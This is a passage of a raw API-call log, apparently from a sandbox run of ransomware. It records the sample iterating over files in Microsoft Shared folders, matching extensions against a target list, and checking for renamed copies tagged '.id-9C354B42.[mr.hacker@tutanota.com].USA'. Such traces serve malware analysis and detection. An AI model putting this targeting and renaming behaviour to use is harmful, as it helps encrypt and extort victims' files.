[0041.894] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.894] lstrlenW (lpString=".dbf") returned 4 [0041.894] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.894] lstrlenW (lpString=".1cd") returned 4 [0041.894] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.894] lstrlenW (lpString=".jpg") returned 4 [0041.894] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.894] lstrcmpiW (lpString1=".htm", lpString2=".USA") returned -1 [0041.894] lstrlenW (lpString="Bears.htm") returned 9 [0041.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.742] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=255) returned 1 [0042.742] CloseHandle (hObject=0x200) returned 1 [0042.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0042.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.742] lstrlenW (lpString=".doc") returned 4 [0042.742] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.742] lstrlenW (lpString=".docx") returned 5 [0042.742] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.742] lstrlenW (lpString=".pdf") returned 4 [0042.742] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.742] lstrlenW (lpString=".xls") returned 4 [0042.742] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.742] lstrlenW (lpString=".xlsx") returned 5 [0042.742] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.742] lstrlenW (lpString=".ppt") returned 4 [0042.743] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.743] lstrlenW (lpString=".zip") returned 4 [0042.743] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.743] lstrlenW (lpString=".rar") returned 4 [0042.743] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.743] lstrlenW (lpString=".bz2") returned 4 [0042.743] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.743] lstrlenW (lpString=".7z") returned 3 [0042.743] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.743] lstrlenW (lpString=".dbf") returned 4 [0042.743] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.743] lstrlenW (lpString=".1cd") returned 4 [0042.743] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.743] lstrlenW (lpString=".jpg") returned 4 [0042.743] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.743] lstrlenW (lpString=".doc") returned 4 [0042.743] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.743] lstrlenW (lpString=".docx") returned 5 [0042.743] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.743] lstrlenW (lpString=".pdf") returned 4 [0042.744] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.744] lstrlenW (lpString=".xls") returned 4 [0042.744] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.744] lstrlenW (lpString=".xlsx") returned 5 [0042.744] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.744] lstrlenW (lpString=".ppt") returned 4 [0042.744] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.744] lstrlenW (lpString=".zip") returned 4 [0042.744] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.744] lstrlenW (lpString=".rar") returned 4 [0042.744] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.744] lstrlenW (lpString=".bz2") returned 4 [0042.744] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.744] lstrlenW (lpString=".7z") returned 3 [0042.744] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.744] lstrlenW (lpString=".dbf") returned 4 [0042.744] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.744] lstrlenW (lpString=".1cd") returned 4 [0042.744] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0042.744] lstrlenW (lpString=".jpg") returned 4 [0042.744] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.744] lstrcmpiW (lpString1=".htm", lpString2=".USA") returned -1 [0042.744] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0042.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.745] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=237) returned 1 [0042.745] CloseHandle (hObject=0x200) returned 1 [0042.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0042.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.746] lstrlenW (lpString=".doc") returned 4 [0042.746] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.746] lstrlenW (lpString=".docx") returned 5 [0042.746] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.746] lstrlenW (lpString=".pdf") returned 4 [0042.746] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.746] lstrlenW (lpString=".xls") returned 4 [0042.746] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.746] lstrlenW (lpString=".xlsx") returned 5 [0042.746] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.746] lstrlenW (lpString=".ppt") returned 4 [0042.746] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.746] lstrlenW (lpString=".zip") returned 4 [0042.746] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.746] lstrlenW (lpString=".rar") returned 4 [0042.746] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.746] lstrlenW (lpString=".bz2") returned 4 [0042.746] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.746] lstrlenW (lpString=".7z") returned 3 [0042.746] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.746] lstrlenW (lpString=".dbf") returned 4 [0042.746] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString=".1cd") returned 4 [0042.747] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString=".jpg") returned 4 [0042.747] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString=".doc") returned 4 [0042.747] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.747] lstrlenW (lpString=".docx") returned 5 [0042.747] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.747] lstrlenW (lpString=".pdf") returned 4 [0042.747] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.747] lstrlenW (lpString=".xls") returned 4 [0042.747] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.747] lstrlenW (lpString=".xlsx") returned 5 [0042.747] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.747] lstrlenW (lpString=".ppt") returned 4 [0042.747] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString=".zip") returned 4 [0042.747] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.747] lstrlenW (lpString=".rar") returned 4 [0042.747] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.747] lstrlenW (lpString=".bz2") returned 4 [0042.747] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.747] lstrlenW (lpString=".7z") returned 3 [0042.747] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString=".dbf") returned 4 [0042.747] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.747] lstrlenW (lpString=".1cd") returned 4 [0042.748] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.748] lstrlenW (lpString=".jpg") returned 4 [0042.748] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.748] lstrcmpiW (lpString1=".jpg", lpString2=".USA") returned -1 [0042.748] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0042.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.748] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=6406) returned 1 [0042.748] CloseHandle (hObject=0x200) returned 1 [0042.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0042.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.748] lstrlenW (lpString=".doc") returned 4 [0042.748] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.748] lstrlenW (lpString=".docx") returned 5 [0042.748] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.749] lstrlenW (lpString=".pdf") returned 4 [0042.749] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.749] lstrlenW (lpString=".xls") returned 4 [0042.749] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.749] lstrlenW (lpString=".xlsx") returned 5 [0042.749] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.749] lstrlenW (lpString=".ppt") returned 4 [0042.749] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.749] lstrlenW (lpString=".zip") returned 4 [0042.749] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.749] lstrlenW (lpString=".rar") returned 4 [0042.749] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.749] lstrlenW (lpString=".bz2") returned 4 [0042.749] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.749] lstrlenW (lpString=".7z") returned 3 [0042.749] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.749] lstrlenW (lpString=".dbf") returned 4 [0042.749] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.749] lstrlenW (lpString=".1cd") returned 4 [0042.749] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.749] lstrlenW (lpString=".jpg") returned 4 [0042.749] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.749] lstrlenW (lpString=".doc") returned 4 [0042.749] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.749] lstrlenW (lpString=".docx") returned 5 [0042.749] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.749] lstrlenW (lpString=".pdf") returned 4 [0042.749] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.750] lstrlenW (lpString=".xls") returned 4 [0042.750] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.750] lstrlenW (lpString=".xlsx") returned 5 [0042.750] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.750] lstrlenW (lpString=".ppt") returned 4 [0042.750] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.750] lstrlenW (lpString=".zip") returned 4 [0042.750] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.750] lstrlenW (lpString=".rar") returned 4 [0042.750] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.750] lstrlenW (lpString=".bz2") returned 4 [0042.750] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.750] lstrlenW (lpString=".7z") returned 3 [0042.750] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.750] lstrlenW (lpString=".dbf") returned 4 [0042.750] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.750] lstrlenW (lpString=".1cd") returned 4 [0042.750] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.750] lstrlenW (lpString=".jpg") returned 4 [0042.750] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.750] lstrcmpiW (lpString1=".wmf", lpString2=".USA") returned 1 [0042.750] lstrlenW (lpString="grid_(cm).wmf") returned 13 [0042.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.751] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2920) returned 1 [0042.751] CloseHandle (hObject=0x200) returned 1 [0042.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20 [0042.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.751] lstrlenW (lpString=".doc") returned 4 [0042.751] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.751] lstrlenW (lpString=".docx") returned 5 [0042.751] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.751] lstrlenW (lpString=".pdf") returned 4 [0042.751] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.751] lstrlenW (lpString=".xls") returned 4 [0042.751] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.751] lstrlenW (lpString=".xlsx") returned 5 [0042.751] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.751] lstrlenW (lpString=".ppt") returned 4 [0042.751] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.751] lstrlenW (lpString=".zip") returned 4 [0042.751] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.751] lstrlenW (lpString=".rar") returned 4 [0042.751] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.751] lstrlenW (lpString=".bz2") returned 4 [0042.751] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString=".7z") returned 3 [0042.752] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.752] lstrlenW (lpString=".dbf") returned 4 [0042.752] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.752] lstrlenW (lpString=".1cd") returned 4 [0042.752] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.752] lstrlenW (lpString=".jpg") returned 4 [0042.752] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.752] lstrlenW (lpString=".doc") returned 4 [0042.752] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString=".docx") returned 5 [0042.752] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.752] lstrlenW (lpString=".pdf") returned 4 [0042.752] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString=".xls") returned 4 [0042.752] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.752] lstrlenW (lpString=".xlsx") returned 5 [0042.752] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.752] lstrlenW (lpString=".ppt") returned 4 [0042.752] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.752] lstrlenW (lpString=".zip") returned 4 [0042.752] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.752] lstrlenW (lpString=".rar") returned 4 [0042.752] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString=".bz2") returned 4 [0042.752] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.752] lstrlenW (lpString=".7z") returned 3 [0042.753] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.753] lstrlenW (lpString=".dbf") returned 4 [0042.753] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.753] lstrlenW (lpString=".1cd") returned 4 [0042.753] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.753] lstrlenW (lpString=".jpg") returned 4 [0042.753] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.753] lstrcmpiW (lpString1=".wmf", lpString2=".USA") returned 1 [0042.753] lstrlenW (lpString="grid_(inch).wmf") returned 15 [0042.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.753] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=7498) returned 1 [0042.753] CloseHandle (hObject=0x200) returned 1 [0042.753] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20 [0042.753] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString=".doc") returned 4 [0042.754] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString=".docx") returned 5 [0042.754] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.754] lstrlenW (lpString=".pdf") returned 4 [0042.754] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString=".xls") returned 4 [0042.754] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.754] lstrlenW (lpString=".xlsx") returned 5 [0042.754] 